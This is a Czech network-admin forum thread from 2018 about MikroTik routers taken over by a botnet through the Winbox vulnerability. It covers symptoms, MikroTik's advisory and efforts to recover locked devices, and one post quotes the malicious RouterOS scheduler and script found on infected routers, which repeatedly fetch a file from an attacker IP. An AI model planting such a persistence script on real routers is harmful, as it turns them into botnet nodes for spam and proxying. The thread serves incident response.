MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

[mpcz]

Toto je už stará věc - máš to napadnuté a útočník má libovolný přístup. Ať to nemusí psát někdo jiný - proč se vůbec divíš, když tam máš starou verzi ROS, ještě děravější, než tu poslední děravou? Použij upgradovací kombajn, kterých je zde ke stažení plno a co nejrychleji upgraduj všechny stroje na poslední verzi ROS. Ty napadené už samozřejmě nezachráníš. Dobré je to, že u této varianty je to napadení jasně vidět. Začínají se ale objevovat hromadné případy (stovky) napadených/zamklých strojů na Privátních! adresách, to pak opravdu není o co stát. Pokud jsi ochoten, dobré je napsat, jaké byly otevřené porty, IP atd. atd., na to by se mohl udělat snad i formulář. mpcz, 31.7.2018

[Dalibor Toman]

nezaznamenali jste od 30.7 zvyseny pocet odeslanych emailu od zakazniku?
aktualne pozoruji ze vsichni s Mk maji

Kód: Vybrat vše

/system scheduleradd interval=30s name=schedule3_ on-event=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup/system scriptadd name=script3_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http"
a ve files: mikrotik.php


ip adresa pouzivaji 95.154.216.164-165-166
bezi to i na MK s 6.40.6, problemy jsem zatim nezaznamenal na MK s 6.40.8, ale je to zatim prvni dojem

tenhle typ 'infekce' jeste povoluje SOCKS server, ktery nastavuje tusim na port 4145. Diky SOCKS muze pak delat cokoliv - tedy i rozesilat maily z IP zakazniku. Zda se, ze je to v posledni dobe nejbeznejsi typ nakazi. Vyznam toho mikrotik.php filu je zrejme jen indikace, ze uz je napadeny

[goblajz]

https://blog.mikrotik.com/

[Beny44]

Tak jsem přesně taky tak dopadl. Mikrotik posílal na hotmail Mikrosoftu tisíce emailů denně.

smtp mikrotik.jpg (77.6 KiB) Zobrazeno 5105 x

[okoun]

na nás útočí jak kulomet už delší dobu 185.215.233.x máte to také tak?

[mpcz]

Zdvořilý dotaz - proč tam je "x"? Děkuji, mpcz, 2.aug.2018

[Dalibor Toman]

Zdvořilý dotaz - proč tam je "x"? Děkuji, mpcz, 2.aug.2018

proto, ze ty z te site je tech IP vic.
U nas to vypada, ze z toho Ccka k nam leze jen takove to bezne domaci skenovani (nejcasteji 23, 80 8080)

[the.max]

Dneska mi přišlo do mailu tohle:

Hello,

It has come to our attention that a rogue botnet is currently using a vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018.
Since all RouterOS devices offer free upgrades with just two clicks, we urge you to upgrade your devices with the "Check for updates" button, if you haven't done so already.
Steps to be taken:

- Upgrade RouterOS to the latest release
- Change your password after upgrading
- Restore your configuration and inspect it for unknown settings
- Implement a good firewall according to the article here:

https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

All versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable. Is your device affected? If you have open Winbox access to untrusted networks and are running one of the affected versions: yes, you could be affected. Follow advice above. If Winbox is not available to internet, you might be safe, but upgrade still recommended.

More information about the issue can be found here: https://blog.mikrotik.com

Best regards,
MikroTik

Takže tu jasně píšou, že verze vydané v rozmezí 6.29 (28.5.2015) až 6.42 (20.4.2018) jsou zranitelné a že WinBox by se měl povolovat pouze do důvěryhodných sítí.

O SSHčku tam nic nepíší, takže SSH považují za bezpečné a v tom případě, pokud se nechá SSH povolené, dá se skrz něj protunelovat WinBox i z nedůvěryhodné sítě. Jak protunelovat WInBox skrz SSHčko jsem psal tady.

[Robotvor]

Dneska mi přišlo do mailu tohle:

Hello,

It has come to our attention that a rogue botnet is currently using a vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018.
Since all RouterOS devices offer free upgrades with just two clicks, we urge you to upgrade your devices with the "Check for updates" button, if you haven't done so already.
Steps to be taken:

- Upgrade RouterOS to the latest release
- Change your password after upgrading
- Restore your configuration and inspect it for unknown settings
- Implement a good firewall according to the article here:

https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

All versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable. Is your device affected? If you have open Winbox access to untrusted networks and are running one of the affected versions: yes, you could be affected. Follow advice above. If Winbox is not available to internet, you might be safe, but upgrade still recommended.

More information about the issue can be found here: https://blog.mikrotik.com

Best regards,
MikroTik

Takže tu jasně píšou, že verze vydané v rozmezí 6.29 (28.5.2015) až 6.42 (20.4.2018) jsou zranitelné a že WinBox by se měl povolovat pouze do důvěryhodných sítí.

O SSHčku tam nic nepíší, takže SSH považují za bezpečné a v tom případě, pokud se nechá SSH povolené, dá se skrz něj protunelovat WinBox i z nedůvěryhodné sítě. Jak protunelovat WInBox skrz SSHčko jsem psal tady.

Takže s 6.42.1 můžeme být v klidu ? Tu máme skoro všude.

[Dalibor Toman]

https://www.root.cz/zpravicky/mikrotik- ... kryptomen/

[3com]

Stále nikdo nemá nějaké nové info na jaký login a heslo tento virus mohl údaje MK změnit? Několik napadených/zavirovaných MK už máme na stole, ale všechny pokusy o login i přes mac jsou bez úspěchu... Všechny možné kombinace loginu/hesel neúspěšné.. Tři dny googlování také nepřineslo žádné ovoce.. Všude se o tom píše co to dělá jak se to chová po zavirování, ale login a heslo na který to mohlo změnit nikde není... Přístup z internetu přes který se tato událost stala už máme ošetřený/zakázaný a požadavky o login tam teď skáčou pěkným tempem do dropu... Podařilo se zjistit na které IP tyto infikované stroje dotazují spojení a čekají odpověď. Jsou to IP ze dvou rozsahů, jedna v Rusku druhá Thaiwan. Po zakázání ve firewall hlavního routeru do internetu to tam skáče také pěkným tempem do dropu... Infikované stroje stačí vyresetovat do defaultu, znova nastavit a pak upgrade na MK 6.42.5 a výše, povolit IP-Services na IP z vlastního rozsahu a je klid.. Ale máme tady ještě 79ks do kterých se nedostaneme a je k něm těžký a složitý přístup.... vyresetovat to osobně a znova nastavit by byla akce tak na 4 týdny... Zjištění loginu a hesla po zavirovaní by vše vyřešila.... Nemá někdo z Moravy/Slezka nějaké nástroje jak to zkusit ze zavirovaného stroje zjistit? Vždy se jedná o verzi MK 6.41.3, přivezeme osobně, platíme zlatem


Další postřeh je ten, že po zjištění této nákazy máme aktuálně na wan portu do internetu 3x větší upload než byl kdykoliv jindy za poslední celý rok....

WTF upload

WTF.png (54.18 KiB) Zobrazeno 4139 x

[ludvik]

Ty python scripty, co sem dával hapi odkazy jsi zkoušel?

[mpcz]

Stále nikdo nemá nějaké nové info na jaký login a heslo tento virus mohl údaje MK změnit? Několik napadených/zavirovaných MK už máme na stole, ale všechny pokusy o login i přes mac jsou bez úspěchu... Všechny možné kombinace loginu/hesel neúspěšné.. Tři dny googlování také nepřineslo žádné ovoce.. Všude se o tom píše co to dělá jak se to chová po zavirování, ale login a heslo na který to mohlo změnit nikde není... Přístup z internetu přes který se tato událost stala už máme ošetřený/zakázaný a požadavky o login tam teď skáčou pěkným tempem do dropu... Podařilo se zjistit na které IP tyto infikované stroje dotazují spojení a čekají odpověď. Jsou to IP ze dvou rozsahů, jedna v Rusku druhá Thaiwan. Po zakázání ve firewall hlavního routeru do internetu to tam skáče také pěkným tempem do dropu... Infikované stroje stačí vyresetovat do defaultu, znova nastavit a pak upgrade na MK 6.42.5 a výše, povolit IP-Services na IP z vlastního rozsahu a je klid.. Ale máme tady ještě 79ks do kterých se nedostaneme a je k něm těžký a složitý přístup.... vyresetovat to osobně a znova nastavit by byla akce tak na 4 týdny... Zjištění loginu a hesla po zavirovaní by vše vyřešila.... Nemá někdo z Moravy/Slezka nějaké nástroje jak to zkusit ze zavirovaného stroje zjistit? Vždy se jedná o verzi MK 6.41.3, přivezeme osobně, platíme zlatem


Další postřeh je ten, že po zjištění této nákazy máme aktuálně na wan portu do internetu 3x větší upload než byl kdykoliv jindy za poslední celý rok.... WTF.png

Už jsem to tu psal, že pokud to není nějaká novinka, heslo zjistím i v bezpečných, posledních verzích. Pošli mi jeden zamklý RB, zkusím to. Za to nic nedáš. Max. stovku za poštu (RB750?). mpcz, 24.8.2018

[Dalibor Toman]

...

videl jsem na nekterych MT, ze uzivatelum byly definovany site, ze kterych se mohou prihlasit. Takze i kdyz mas heslo, nepripojis se.
Na jedne desce byl jen uzivatel system s povolenym prihlasenim z 23.0.0.0/8...

[Dalibor Toman]

není nějaká novinka[/b], heslo zjistím i v bezpečných, posledních verzích. Pošli mi jeden zamklý RB, zkusím to. Za to nic nedáš. Max. stovku za poštu (RB750?). mpcz, 24.8.2018

bootujes do OpenWRT a prectes databazi uzivatelu z flashky?